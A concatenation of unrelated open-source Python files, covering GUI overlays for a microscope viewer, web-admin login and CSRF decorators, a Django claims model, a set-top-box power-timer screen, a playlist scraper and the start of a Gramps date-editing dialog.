if self.active and self.dragging:
self._calculate_display(evt.GetPositionTuple())
self.cnvs.Refresh()
else:
base.ViewOverlay.on_motion(self, evt)
def on_enter(self, evt):
if self.active:
self.cnvs.set_default_cursor(wx.CROSS_CURSOR)
else:
base.ViewOverlay.on_enter(self, evt)
def on_leave(self, evt):
if self.active:
self.cnvs.reset_default_cursor()
else:
base.ViewOverlay.on_leave(self, evt)
def on_size(self, evt=None):
# Calculate the characteristic values
self.center_x = self.cnvs.ClientSize.x / 2
self.center_y = self.cnvs.ClientSize.y / 2
self.inner_radius = min(self.center_x, self.center_y)
self.radius = self.inner_radius + (self.ticksize / 1.5)
self.ticks = []
# Top middle
for i in range(self.num_ticks):
# phi needs to be rotated 90 degrees counter clockwise, otherwise
# 0 degrees will be at the right side of the circle
phi = (self.tau / self.num_ticks * i) - (math.pi / 2)
deg = round(math.degrees(phi))
cos = math.cos(phi)
sin = math.sin(phi)
# Tick start and end point (outer and inner)
ox = self.center_x + self.radius * cos
oy = self.center_y + self.radius * sin
ix = self.center_x + (self.radius - self.ticksize) * cos
iy = self.center_y + (self.radius - self.ticksize) * sin
# Tick label positions
lx = self.center_x + (self.radius + 5) * cos
ly = self.center_y + (self.radius + 5) * sin
label = self.add_label(u"%d°" % (deg + 90),
(lx, ly),
colour=(0.8, 0.8, 0.8),
deg=deg - 90,
flip=True,
align=wx.ALIGN_CENTRE_HORIZONTAL | wx.ALIGN_BOTTOM)
self.ticks.append((ox, oy, ix, iy, label))
self._calculate_display()
if evt:
base.ViewOverlay.on_size(self, evt)
# END Event Handlers
def draw(self, ctx):
# Draw angle lines
ctx.set_line_width(2.5)
ctx.set_source_rgba(0, 0, 0, 0.2 if self.dragging else 0.5)
if self.theta is not None:
# Draw dark underline azimuthal circle
ctx.arc(self.center_x, self.center_y,
self.theta_radius, 0, self.tau)
ctx.stroke()
if self.phi is not None:
# Draw dark underline Phi line
ctx.move_to(self.center_x, self.center_y)
ctx.line_to(*self.phi_line_pos)
ctx.stroke()
# Light selection lines formatting
ctx.set_line_width(2)
ctx.set_dash([3])
if self.dragging:
ctx.set_source_rgba(*self.colour_drag)
else:
ctx.set_source_rgb(*self.colour)
if self.theta is not None:
# Draw azimuthal circle
ctx.arc(self.center_x, self.center_y,
self.theta_radius, 0, self.tau)
ctx.stroke()
self._write_label(ctx, self.theta_label)
if self.phi is not None:
# Draw Phi line
ctx.move_to(self.center_x, self.center_y)
ctx.line_to(*self.phi_line_pos)
ctx.stroke()
self._write_label(ctx, self.phi_label)
ctx.set_dash([])
# ## Draw angle markings ###
# Draw frame that covers everything outside the center circle
ctx.set_fill_rule(cairo.FILL_RULE_EVEN_ODD)
ctx.set_source_rgb(0.2, 0.2, 0.2)
ctx.rectangle(0, 0, self.cnvs.ClientSize.x, self.cnvs.ClientSize.y)
ctx.arc(self.center_x, self.center_y, self.inner_radius, 0, self.tau)
# mouse_inside = not ctx.in_fill(float(self.vx or 0), float(self.vy or 0))
ctx.fill()
# Draw Azimuth degree circle
ctx.set_line_width(2)
ctx.set_source_rgb(0.5, 0.5, 0.5)
ctx.arc(self.center_x, self.center_y, self.radius, 0, self.tau)
ctx.stroke()
# Draw Azimuth degree ticks
ctx.set_line_width(1)
for sx, sy, lx, ly, _ in self.ticks:
ctx.move_to(sx, sy)
ctx.line_to(lx, ly)
ctx.stroke()
# Draw tick labels, ignore padding in this case
pad, self.canvas_padding = self.canvas_padding, 0
for _, _, _, _, label in self.ticks:
self._write_label(ctx, label)
self.canvas_padding = pad
if self.intensity_label.text and self.intersection:
ctx.set_source_rgb(*self.colour_highlight)
ctx.arc(self.intersection[0], self.intersection[1], 3, 0, self.tau)
ctx.fill()
x, y = self.intersection
y -= 18
if y < 40:
y += 40
self.intensity_label.pos = (x, y)
self._write_label(ctx, self.intensity_label)
class PointSelectOverlay(base.ViewOverlay):
""" Overlay for the selection of canvas points in view, world and physical coordinates """
def __init__(self, cnvs):
base.ViewOverlay.__init__(self, cnvs)
# Prevent the cursor from resetting on clicks
# Physical position of the last click
self.v_pos = model.VigilantAttribute(None)
self.w_pos = model.VigilantAttribute(None)
self.p_pos = model.VigilantAttribute(None)
# Event Handlers
def on_enter(self, evt):
if self.active:
self.cnvs.set_default_cursor(wx.CROSS_CURSOR)
else:
base.ViewOverlay.on_enter(self, evt)
def on_leave(self, evt):
if self.active:
self.cnvs.reset_default_cursor()
else:
base.ViewOverlay.on_leave(self, evt)
def on_left_down(self, evt):
if not self.active:
base.ViewOverlay.on_left_down(self, evt)
def on_left_up(self, evt):
if self.active:
v_pos = evt.GetPositionTuple()
w_pos = self.cnvs.view_to_world(v_pos, self.cnvs.get_half_buffer_size())
self.v_pos.value = v_pos
self.w_pos.value = w_pos
self.p_pos.value = self.cnvs.world_to_physical_pos(w_pos)
logging.debug("Point selected (view, world, physical): %s, %s, %s)",
self.v_pos.value, self.w_pos.value, self.p_pos.value)
else:
base.ViewOverlay.on_left_up(self, evt)
# END Event Handlers
def draw(self, ctx):
pass
class HistoryOverlay(base.ViewOverlay):
""" Display rectangles on locations that the microscope was previously positioned at """
def __init__(self, cnvs, history_list_va):
base.ViewOverlay.__init__(self, cnvs)
self.trail_colour = conversion.hex_to_frgb(gui.FG_COLOUR_HIGHLIGHT)
self.pos_colour = conversion.hex_to_frgb(gui.FG_COLOUR_EDIT)
self.fade = True # Fade older positions in the history list
self.history = history_list_va # ListVA of (center, size) tuples
self.history.subscribe(self._on_history_update)
def __str__(self):
return "History (%d): \n" % len(self) + "\n".join([str(h) for h in self.history.value[-5:]])
# # Event Handlers
#
# def on_enter(self, evt):
# base.ViewOverlay.on_enter(self, evt)
# self.cnvs.Refresh()
#
# def on_leave(self, evt):
# base.ViewOverlay.on_leave(self, evt)
# self.cnvs.Refresh()
#
# # END Event Handlers
# TODO: might need rate limiter (but normally stage position is changed rarely)
# TODO: Make the update of the canvas image the responsibility of the viewport
def _on_history_update(self, _):
self.cnvs.update_drawing()
def draw(self, ctx, scale=None, shift=None):
"""
scale (0<float): ratio between the canvas pixel size and the pixel size
of the drawing area. That's a trick to allow drawing both on the
standard view and directly onto the thumbnail.
shift (float, float): offset to add for positioning the drawing, when
it is scaled
"""
ctx.set_line_width(1)
offset = self.cnvs.get_half_buffer_size()
for i, (p_center, p_size) in enumerate(self.history.value):
alpha = (i + 1) * (0.8 / len(self.history.value)) + 0.2 if self.fade else 1.0
v_center = self.cnvs.world_to_view(self.cnvs.physical_to_world_pos(p_center), offset)
if scale:
v_center = (shift[0] + v_center[0] * scale,
shift[1] + v_center[1] * scale)
marker_size = (2, 2)
elif p_size:
marker_size = (int(p_size[0] * self.cnvs.scale),
int(p_size[1] * self.cnvs.scale))
# Prevent the marker from becoming too small
if marker_size[0] < 2 or marker_size[1] < 2:
marker_size = (3, 3)
else:
marker_size = (5, 5)
if i < len(self.history.value) - 1:
colour = self.trail_colour
else:
colour = self.pos_colour
self._draw_rect(ctx, v_center, marker_size, colour, alpha)
@staticmethod
def _draw_rect(ctx, v_center, v_size, colour, alpha):
ctx.set_source_rgba(0, 0, 0, alpha * 0.4)
x = int(v_center[0] - v_size[0] / 2.0) + 0.5
y = int(v_center[1] - v_size[1] / 2.0) + 0.5
ctx.rectangle(x + 1, y + 1, v_size[0], v_size[1])
ctx.stroke()
ctx.set_source_rgba(colour[0], colour[1], colour[2], alpha)
# Render rectangles of 3 pixels wide
ctx.rectangle(x, y, v_size[0], v_size[1])
ctx.stroke()
class SpotModeOverlay(base.ViewOverlay, base.DragMixin, base.SpotModeBase):
""" Render the spot mode indicator in the center of the view
If a position is provided, the spot will be drawn there.
If the overlay is activated, the user can use the mouse cursor to select a position
"""
def __init__(self, cnvs, spot_va=None):
base.ViewOverlay.__init__(self, cnvs)
base.DragMixin.__init__(self)
base.SpotModeBase.__init__(self, cnvs, spot_va=spot_va)
self.v_pos = None
def on_spot_change(self, _):
self._r_to_v()
def on_size(self, evt):
self._r_to_v()
base.ViewOverlay.on_size(self, evt)
def _v_to_r(self):
if self.v_pos is None:
self.r_pos.value = (0.5, 0.5)
else:
self.r_pos.value = (
float(self.v_pos[0] / self.cnvs.view_width),
float(self.v_pos[1] / self.cnvs.view_height)
)
def _r_to_v(self):
try:
self.v_pos = (
int(self.cnvs.view_width * self.r_pos.value[0]),
int(self.cnvs.view_height * self.r_pos.value[1])
)
except (TypeError, KeyError):
self.v_pos = None
def draw(self, ctx, shift=(0, 0), scale=1.0):
if self.v_pos is None:
return
vx, vy = self.v_pos
base.SpotModeBase.draw(self, ctx, vx, vy)
def activate(self):
self._r_to_v()
base.ViewOverlay.activate(self)
def deactivate(self):
self.v_pos = None
base.ViewOverlay.deactivate(self)
| ktsitsikas/odemis | src/odemis/gui/comp/overlay/view.py | Python | gpl-2.0 | 50,884 |
# Author: Zhang Huangbin <zhb@iredmail.org>
import web
session = web.config.get('_session')
def require_login(func):
def proxyfunc(self, *args, **kw):
if session.get('logged') is True:
return func(self, *args, **kw)
else:
session.kill()
raise web.seeother('/login?msg=loginRequired')
return proxyfunc
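# Usage sketch (hypothetical web.py handler class):
#   class Profile:
#       @require_login
#       def GET(self):
#           return web.render('profile.html')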
def require_global_admin(func):
def proxyfunc(self, *args, **kw):
if session.get('domainGlobalAdmin') is True:
return func(self, *args, **kw)
else:
if session.get('logged'):
raise web.seeother('/domains?msg=PERMISSION_DENIED')
else:
raise web.seeother('/login?msg=PERMISSION_DENIED')
return proxyfunc
def csrf_protected(f):
def decorated(*args, **kw):
inp = web.input()
if not ('csrf_token' in inp and \
inp.csrf_token == session.pop('csrf_token', None)):
return web.render('error_csrf.html')
return f(*args, **kw)
return decorated
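# Note: the page rendering the protected form is expected to embed the
# matching token as a hidden field, e.g.
#   <input type="hidden" name="csrf_token" value="..." />
# so web.input() can compare it against the session copy on submit.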
| villaverde/iredadmin | controllers/decorators.py | Python | gpl-2.0 | 1,054 |
from django.db import models
from jokeregistryweb.jokes.models import Joke
class Claim(models.Model):
'''A claim of prior art (or infringement)'''
FILED = 0
APPROVED = 1
REJECTED = 2
STATUS_CHOICES = (
(FILED, 'Filed'),
(APPROVED, 'Approved'),
(REJECTED, 'Rejected')
)
infringing_joke = models.ForeignKey(
'jokes.Joke',
related_name='infringing_claim',
help_text='The infringing joke')
infringed_joke = models.ForeignKey(
'jokes.Joke',
related_name='infringed_claim',
help_text='The original joke')
text = models.TextField(help_text='additional detail', null=True, blank=True)
status = models.IntegerField(choices=STATUS_CHOICES, default=FILED)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('-created', '-updated')
def approve(self):
if self.infringed_joke.created < self.infringing_joke.created:
self.infringing_joke.parent = self.infringed_joke
self.infringing_joke.save()
self.status = Claim.APPROVED
self.save()
def reject(self):
self.status = Claim.REJECTED
self.save()
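# Usage sketch (hypothetical; assumes two existing Joke rows):
#   claim = Claim.objects.create(infringing_joke=copy, infringed_joke=original)
#   claim.approve()  # links the newer joke to the older one (when the dates
#                    # allow it) and marks the claim approved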
| jokeregistry/jokeregistryweb | jokeregistryweb/claims/models.py | Python | gpl-2.0 | 1,263 |
from functools import cmp_to_key
from time import time
from timer import TimerEntry as RealTimerEntry
from PowerTimer import PowerTimerEntry, AFTEREVENT
from Components.ActionMap import ActionMap
from Components.Button import Button
from Components.config import config
from Components.Label import Label
from Components.PowerTimerList import PowerTimerList, gettimerType, getafterEvent
from Components.Sources.StaticText import StaticText
from Components.Sources.ServiceEvent import ServiceEvent
from Screens.ChoiceBox import ChoiceBox
from Screens.MessageBox import MessageBox
from Screens.PowerTimerEntry import TimerEntry
from Screens.Screen import Screen
from Screens.TimerEntry import TimerLog
from Tools.BoundFunction import boundFunction
from Tools.FuzzyDate import FuzzyTime
class PowerTimerEditList(Screen):
EMPTY = 0
ENABLE = 1
DISABLE = 2
CLEANUP = 3
DELETE = 4
def __init__(self, session):
Screen.__init__(self, session)
self.skinName = "TimerEditList"
Screen.setTitle(self, _("PowerTimer list"))
self.onChangedEntry = []
list = []
self.list = list
self.fillTimerList()
self["timerlist"] = PowerTimerList(list)
self.key_red_choice = self.EMPTY
self.key_yellow_choice = self.EMPTY
self.key_blue_choice = self.EMPTY
self["key_red"] = Button(" ")
self["key_green"] = Button(_("Add"))
self["key_yellow"] = Button(" ")
self["key_blue"] = Button(" ")
self["description"] = Label()
self["ServiceEvent"] = ServiceEvent()
self["actions"] = ActionMap(["OkCancelActions", "DirectionActions", "ShortcutActions", "TimerEditActions"],
{
"ok": self.openEdit,
"cancel": self.leave,
"green": self.addCurrentTimer,
"log": self.showLog,
"left": self.left,
"right": self.right,
"up": self.up,
"down": self.down
}, -1)
self.setTitle(_("PowerTimer Overview"))
self.session.nav.PowerTimer.on_state_change.append(self.onStateChange)
self.onShown.append(self.updateState)
def createSummary(self):
return PowerTimerEditListSummary
def up(self):
self["timerlist"].instance.moveSelection(self["timerlist"].instance.moveUp)
self.updateState()
def down(self):
self["timerlist"].instance.moveSelection(self["timerlist"].instance.moveDown)
self.updateState()
def left(self):
self["timerlist"].instance.moveSelection(self["timerlist"].instance.pageUp)
self.updateState()
def right(self):
self["timerlist"].instance.moveSelection(self["timerlist"].instance.pageDown)
self.updateState()
def toggleDisabledState(self):
cur = self["timerlist"].getCurrent()
if cur:
t = cur
if t.disabled:
print("[PowerTimerEdit] try to enable timer")
t.enable()
else:
if t.isRunning():
if t.repeated:
list = (
(_("Stop current event but not coming events"), "stoponlycurrent"),
(_("Stop current event and disable coming events"), "stopall"),
(_("Don't stop current event but disable coming events"), "stoponlycoming")
)
self.session.openWithCallback(boundFunction(self.runningEventCallback, t), ChoiceBox, title=_("Repeating event currently recording... What do you want to do?"), list=list)
else:
t.disable()
self.session.nav.PowerTimer.timeChanged(t)
self.refill()
self.updateState()
def runningEventCallback(self, t, result):
if result is not None:
if result[1] == "stoponlycurrent" or result[1] == "stopall":
t.enable()
t.processRepeated(findRunningEvent=False)
self.session.nav.PowerTimer.doActivate(t)
if result[1] == "stoponlycoming" or result[1] == "stopall":
t.disable()
self.session.nav.PowerTimer.timeChanged(t)
self.refill()
self.updateState()
def removeAction(self, descr):
actions = self["actions"].actions
if descr in actions:
del actions[descr]
def updateState(self):
cur = self["timerlist"].getCurrent()
if cur:
if self.key_red_choice != self.DELETE:
self["actions"].actions.update({"red": self.removeTimerQuestion})
self["key_red"].setText(_("Delete"))
self.key_red_choice = self.DELETE
if cur.disabled and (self.key_yellow_choice != self.ENABLE):
self["actions"].actions.update({"yellow": self.toggleDisabledState})
self["key_yellow"].setText(_("Enable"))
self.key_yellow_choice = self.ENABLE
elif cur.isRunning() and not cur.repeated and (self.key_yellow_choice != self.EMPTY):
self.removeAction("yellow")
self["key_yellow"].setText("")
self.key_yellow_choice = self.EMPTY
elif ((not cur.isRunning()) or cur.repeated) and (not cur.disabled) and (self.key_yellow_choice != self.DISABLE):
self["actions"].actions.update({"yellow": self.toggleDisabledState})
self["key_yellow"].setText(_("Disable"))
self.key_yellow_choice = self.DISABLE
else:
if self.key_red_choice != self.EMPTY:
self.removeAction("red")
self["key_red"].setText("")
self.key_red_choice = self.EMPTY
if self.key_yellow_choice != self.EMPTY:
self.removeAction("yellow")
self["key_yellow"].setText("")
self.key_yellow_choice = self.EMPTY
showCleanup = True
for x in self.list:
if (not x[0].disabled) and (x[1] == True):
break
else:
showCleanup = False
if showCleanup and (self.key_blue_choice != self.CLEANUP):
self["actions"].actions.update({"blue": self.cleanupQuestion})
self["key_blue"].setText(_("Cleanup"))
self.key_blue_choice = self.CLEANUP
elif (not showCleanup) and (self.key_blue_choice != self.EMPTY):
self.removeAction("blue")
self["key_blue"].setText("")
self.key_blue_choice = self.EMPTY
if len(self.list) == 0:
return
timer = self['timerlist'].getCurrent()
if timer:
name = gettimerType(timer)
if getafterEvent(timer) == "Nothing":
after = ""
else:
after = getafterEvent(timer)
time = "%s %s ... %s" % (FuzzyTime(timer.begin)[0], FuzzyTime(timer.begin)[1], FuzzyTime(timer.end)[1])
duration = ("(%d " + _("mins") + ")") % ((timer.end - timer.begin) / 60)
if timer.state == RealTimerEntry.StateWaiting:
state = _("waiting")
elif timer.state == RealTimerEntry.StatePrepared:
state = _("about to start")
elif timer.state == RealTimerEntry.StateRunning:
state = _("running...")
elif timer.state == RealTimerEntry.StateEnded:
state = _("done!")
else:
state = _("<unknown>")
else:
name = ""
after = ""
time = ""
duration = ""
state = ""
for cb in self.onChangedEntry:
cb(name, after, time, duration, state)
def fillTimerList(self):
#helper function to move finished timers to end of list
def _cmp(a, b):
return (a > b) - (a < b)
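# (re-implements Python 2's cmp(), removed in Python 3; cmp_to_key then
# turns the comparator below into a sort key)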
def eol_compare(x, y):
if x[0].state != y[0].state and (x[0].state == RealTimerEntry.StateEnded or y[0].state == RealTimerEntry.StateEnded):
return _cmp(x[0].state, y[0].state)
return _cmp(x[0].begin, y[0].begin)
_list = self.list
del _list[:]
_list.extend([(timer, False) for timer in self.session.nav.PowerTimer.timer_list])
_list.extend([(timer, True) for timer in self.session.nav.PowerTimer.processed_timers])
if config.usage.timerlist_finished_timer_position.index: #end of list
_list.sort(key=cmp_to_key(eol_compare))
else:
_list.sort(key=lambda x: x[0].begin)
def showLog(self):
cur = self["timerlist"].getCurrent()
if cur:
self.session.openWithCallback(self.finishedEdit, PowerTimerLog, cur)
def openEdit(self):
cur = self["timerlist"].getCurrent()
if cur:
self.session.openWithCallback(self.finishedEdit, TimerEntry, cur)
def cleanupQuestion(self):
self.session.openWithCallback(self.cleanupTimer, MessageBox, _("Really delete completed timers?"))
def cleanupTimer(self, delete):
if delete:
self.session.nav.PowerTimer.cleanup()
self.refill()
self.updateState()
def removeTimerQuestion(self):
cur = self["timerlist"].getCurrent()
if not cur:
return
self.session.openWithCallback(self.removeTimer, MessageBox, _("Do you really want to delete this timer ?"), default=False)
def removeTimer(self, result):
if not result:
return
list = self["timerlist"]
cur = list.getCurrent()
if cur:
timer = cur
timer.afterEvent = AFTEREVENT.NONE
self.session.nav.PowerTimer.removeEntry(timer)
self.refill()
self.updateState()
def refill(self):
oldsize = len(self.list)
self.fillTimerList()
lst = self["timerlist"]
newsize = len(self.list)
if oldsize and oldsize != newsize:
idx = lst.getCurrentIndex()
lst.entryRemoved(idx)
else:
lst.invalidate()
def addCurrentTimer(self):
data = (int(time() + 60), int(time() + 120))
self.addTimer(PowerTimerEntry(checkOldTimers=True, *data))
def addTimer(self, timer):
self.session.openWithCallback(self.finishedAdd, TimerEntry, timer)
def finishedEdit(self, answer):
if answer[0]:
entry = answer[1]
self.session.nav.PowerTimer.timeChanged(entry)
self.fillTimerList()
self.updateState()
else:
print("[PowerTimerEdit] PowerTimerEdit aborted")
def finishedAdd(self, answer):
if answer[0]:
entry = answer[1]
simulTimerList = self.session.nav.PowerTimer.record(entry)
self.fillTimerList()
self.updateState()
else:
print("[PowerTimerEdit] TimerEdit aborted")
def finishSanityCorrection(self, answer):
self.finishedAdd(answer)
def leave(self):
self.session.nav.PowerTimer.on_state_change.remove(self.onStateChange)
self.close()
def onStateChange(self, entry):
self.refill()
self.updateState()
class PowerTimerEditListSummary(Screen):
def __init__(self, session, parent):
Screen.__init__(self, session, parent=parent)
self["name"] = StaticText("")
self["after"] = StaticText("")
self["time"] = StaticText("")
self["duration"] = StaticText("")
self["state"] = StaticText("")
self.onShow.append(self.addWatcher)
self.onHide.append(self.removeWatcher)
def addWatcher(self):
self.parent.onChangedEntry.append(self.selectionChanged)
self.parent.updateState()
def removeWatcher(self):
self.parent.onChangedEntry.remove(self.selectionChanged)
def selectionChanged(self, name, after, time, duration, state):
self["name"].text = name
self["after"].text = after
self["time"].text = time
self["duration"].text = duration
self["state"].text = state
class PowerTimerLog(TimerLog):
def __init__(self, session, timer):
TimerLog.__init__(self, session, timer)
self.skinName = "TimerLog"
self.setTitle(_("PowerTimer Log"))
| openatv/enigma2 | lib/python/Screens/PowerTimerEdit.py | Python | gpl-2.0 | 10,350 |
import os
import cPickle as pkl
from collections import namedtuple
import requests
from bs4 import BeautifulSoup
Song = namedtuple('Song', ['title', 'artist', 'album', 'length'])
class Playlist(object):
def __init__(self, title, url):
self.title = title
self.file_name = title.lower().replace(' ', '-') + '.pkl'
self.url = url
if os.path.isfile(self.file_name):
self.load_from_pickle()
else:
self.songs = []
def load_from_pickle(self):
with open(self.file_name, 'rb') as in_file:
self.songs = pkl.load(in_file)
def download_data(self):
url = self.url
resp = requests.get(url)
soup = BeautifulSoup(resp.text, 'html.parser')
for song_elem in (soup.find(class_='songs')
.find_all(class_='media-body')):
title = song_elem.h4.text
ps = song_elem.find_all('p')
artist, album = ps[0].text.split(u' \xb7 ')
length = ps[1].text
song = Song(title, artist, album, length)
self.songs.append(song)
with open(self.file_name, 'wb') as out:
pkl.dump(self.songs, out)
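# Caveat: if the playlist was already loaded from its pickle,
# download_data() appends the scraped songs to the loaded ones, so
# calling it again can leave duplicates in self.songs.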
ambient_bass = Playlist(
'ambient bass',
'http://www.playlister.io/items/playlist/1472493/ambient-bass/#')
beats = Playlist(
'Blissed-Out Beats',
'http://www.playlister.io/items/playlist/1682151/')
liquid = Playlist(
'Liquid Dubstep',
'http://www.playlister.io/items/playlist/1404323/')
liquid.download_data()
| mshuffett/MetaPyMusic | playlister.py | Python | gpl-2.0 | 1,557 |
# -*- coding: utf-8 -*-
"""Module to check modules existance.
This exports this booleans:
- has_reportlab -- True if reportlab is found
- has_PIL -- True if PIL is found
- has_pygtk -- True if pygtk is found
Copyright (C) 2005-2008 Xosé Otero <xoseotero@users.sourceforge.net>
"""
__all__ = ["has_reportlab", "has_PIL", "has_pygtk"]
try:
import reportlab
has_reportlab = True
except ImportError:
has_reportlab = False
try:
import PIL
has_PIL = True
except ImportError:
has_PIL = False
try:
import pygtk
pygtk.require('2.0')
import gtk
import pango
has_pygtk = True
except Exception:
has_pygtk = False
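# Usage sketch (hypothetical caller):
#   from check_modules import has_reportlab
#   if has_reportlab:
#       ...  # safe to use the reportlab-based PDF output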
| ternus/arcnet | cyber/pythonsudoku/check_modules.py | Python | gpl-2.0 | 644 |
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2002-2006 Donald N. Allingham
# Copyright (C) 2009 Douglas S. Blank
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"""
Date editing module for GRAMPS.
The EditDate provides visual feedback to the user via a pixmap
to indicate whether the associated GtkEntry box contains a valid date. Green
means complete and regular date. Yellow means a valid, but not a regular date.
Red means that the date is not valid, and will be viewed as a text string
instead of a date.
The DateEditor provides a dialog in which the date can be
unambiguously built using UI controls such as menus and spin buttons.
"""
#-------------------------------------------------------------------------
#
# Python modules
#
#-------------------------------------------------------------------------
#-------------------------------------------------------------------------
#
# set up logging
#
#-------------------------------------------------------------------------
import logging
__LOG = logging.getLogger(".EditDate")
#-------------------------------------------------------------------------
#
# GNOME modules
#
#-------------------------------------------------------------------------
from gi.repository import Gtk
#-------------------------------------------------------------------------
#
# gramps modules
#
#-------------------------------------------------------------------------
from gramps.gen.ggettext import sgettext as _
from gramps.gen.lib.date import Date
from gramps.gen.datehandler import displayer
from gramps.gen.const import URL_MANUAL_PAGE
from ..display import display_help
from ..managedwindow import ManagedWindow
from ..glade import Glade
#-------------------------------------------------------------------------
#
# Constants
#
#-------------------------------------------------------------------------
MOD_TEXT = (
(Date.MOD_NONE , _('Regular')),
(Date.MOD_BEFORE , _('Before')),
(Date.MOD_AFTER , _('After')),
(Date.MOD_ABOUT , _('About')),
(Date.MOD_RANGE , _('Range')),
(Date.MOD_SPAN , _('Span')),
(Date.MOD_TEXTONLY , _('Text only')) )
QUAL_TEXT = (
(Date.QUAL_NONE, _('Regular')),
(Date.QUAL_ESTIMATED, _('Estimated')),
(Date.QUAL_CALCULATED, _('Calculated')) )
CAL_TO_MONTHS_NAMES = {
Date.CAL_GREGORIAN : displayer.short_months,
Date.CAL_JULIAN : displayer.short_months,
Date.CAL_HEBREW : displayer.hebrew,
Date.CAL_FRENCH : displayer.french,
Date.CAL_PERSIAN : displayer.persian,
Date.CAL_ISLAMIC : displayer.islamic,
Date.CAL_SWEDISH : displayer.swedish }
WIKI_HELP_PAGE = '%s_-_Entering_and_Editing_Data:_Detailed_-_part_1' % URL_MANUAL_PAGE
WIKI_HELP_SEC = _('manual|Editing_Dates')
#-------------------------------------------------------------------------
#
# EditDate
#
#-------------------------------------------------------------------------
class EditDate(ManagedWindow):
"""
    Dialog that allows the date to be built precisely, to correct possible
    limitations of parsing and/or the underlying structure of Date.
"""
def __init__(self, date, uistate, track):
"""
Initiate and display the dialog.
"""
ManagedWindow.__init__(self, uistate, track, self)
# Create self.date as a copy of the given Date object.
self.date = Date(date)
self.top = Glade()
self.set_window(
self.top.toplevel,
self.top.get_object('title'),
_('Date selection'))
self.calendar_box = self.top.get_object('calendar_box')
for name in Date.ui_calendar_names:
self.calendar_box.get_model().append([name])
self.calendar_box.set_active(self.date.get_calendar())
self.calendar_box.connect('changed', self.switch_calendar)
self.quality_box = self.top.get_object('quality_box')
for item_number in range(len(QUAL_TEXT)):
self.quality_box.append_text(QUAL_TEXT[item_number][1])
if self.date.get_quality() == QUAL_TEXT[item_number][0]:
self.quality_box.set_active(item_number)
self.type_box = self.top.get_object('type_box')
for item_number in range(len(MOD_TEXT)):
self.type_box.append_text(MOD_TEXT[item_number][1])
if self.date.get_modifier() == MOD_TEXT[item_number][0]:
self.type_box.set_active(item_number)
self.type_box.connect('changed', self.switch_type)
self.start_month_box = self.top.get_object('start_month_box')
self.stop_month_box = self.top.get_object('stop_month_box')
month_names = CAL_TO_MONTHS_NAMES[self.date.get_calendar()]
for name in month_names:
self.start_month_box.append_text(name)
self.stop_month_box.append_text(name)
self.start_month_box.set_active(self.date.get_month())
self.stop_month_box.set_active(self.date.get_stop_month())
self.start_day = self.top.get_object('start_day')
self.start_day.set_value(self.date.get_day())
self.start_year = self.top.get_object('start_year')
self.start_year.set_value(self.date.get_year())
self.stop_day = self.top.get_object('stop_day')
self.stop_day.set_value(self.date.get_stop_day())
self.stop_year = self.top.get_object('stop_year')
self.stop_year.set_value(self.date.get_stop_year())
self.dual_dated = self.top.get_object('dualdated')
self.new_year = self.top.get_object('newyear')
self.new_year.set_text(self.date.newyear_to_str())
# Disable second date controls if not compound date
if not self.date.is_compound():
self.stop_day.set_sensitive(0)
self.stop_month_box.set_sensitive(0)
self.stop_year.set_sensitive(0)
# Disable the rest of controls if a text-only date
if self.date.get_modifier() == Date.MOD_TEXTONLY:
self.start_day.set_sensitive(0)
self.start_month_box.set_sensitive(0)
self.start_year.set_sensitive(0)
self.calendar_box.set_sensitive(0)
self.quality_box.set_sensitive(0)
self.dual_dated.set_sensitive(0)
self.new_year.set_sensitive(0)
self.text_entry = self.top.get_object('date_text_entry')
self.text_entry.set_text(self.date.get_text())
if self.date.get_slash():
self.dual_dated.set_active(1)
self.calendar_box.set_sensitive(0)
self.calendar_box.set_active(Date.CAL_JULIAN)
self.dual_dated.connect('toggled', self.switch_dual_dated)
        # The dialog is modal -- since dates don't have names, we don't
        # want to have several open dialogs, since then the user will
        # lose track of which is which. Much like opening files.
self.return_date = None
self.show()
while True:
response = self.window.run()
if response == Gtk.ResponseType.HELP:
display_help(webpage=WIKI_HELP_PAGE,
section=WIKI_HELP_SEC)
elif response == Gtk.ResponseType.DELETE_EVENT:
break
else:
if response == Gtk.ResponseType.OK:
(the_quality, the_modifier, the_calendar, the_value,
the_text, the_newyear) = self.build_date_from_ui()
self.return_date = Date(self.date)
self.return_date.set(
quality=the_quality,
modifier=the_modifier,
calendar=the_calendar,
value=the_value,
text=the_text,
newyear=the_newyear)
self.close()
break
def build_menu_names(self, obj):
"""
Define the menu entry for the ManagedWindows
"""
return (_("Date selection"), None)
def build_date_from_ui(self):
"""
        Collect information from the UI controls and return a
        6-tuple of (quality, modifier, calendar, value, text, newyear)
"""
        # It is important not to set the date based on these controls yet.
        # For example, changing the calendar makes the date inconsistent
        # until the callback of the calendar menu is finished.
# We need to be able to use this function from that callback,
# so here we just report on the state of all widgets, without
# actually modifying the date yet.
modifier = MOD_TEXT[self.type_box.get_active()][0]
text = self.text_entry.get_text()
if modifier == Date.MOD_TEXTONLY:
return (Date.QUAL_NONE, Date.MOD_TEXTONLY, Date.CAL_GREGORIAN,
                    Date.EMPTY, text, Date.NEWYEAR_JAN1)
quality = QUAL_TEXT[self.quality_box.get_active()][0]
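        # Date value tuples are (day, month, year, slash) for simple dates,
        # doubled to eight items for compound range/span dates (see below).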
if modifier in (Date.MOD_RANGE, Date.MOD_SPAN):
value = (
self.start_day.get_value_as_int(),
self.start_month_box.get_active(),
self.start_year.get_value_as_int(),
self.dual_dated.get_active(),
self.stop_day.get_value_as_int(),
self.stop_month_box.get_active(),
self.stop_year.get_value_as_int(),
self.dual_dated.get_active())
else:
value = (
self.start_day.get_value_as_int(),
self.start_month_box.get_active(),
self.start_year.get_value_as_int(),
self.dual_dated.get_active())
calendar = self.calendar_box.get_active()
newyear = Date.newyear_to_code(self.new_year.get_text())
return (quality, modifier, calendar, value, text, newyear)
def switch_type(self, obj):
"""
Disable/enable various date controls depending on the date
type selected via the menu.
"""
the_modifier = MOD_TEXT[self.type_box.get_active()][0]
# Disable/enable second date controls based on whether
# the type allows compound dates
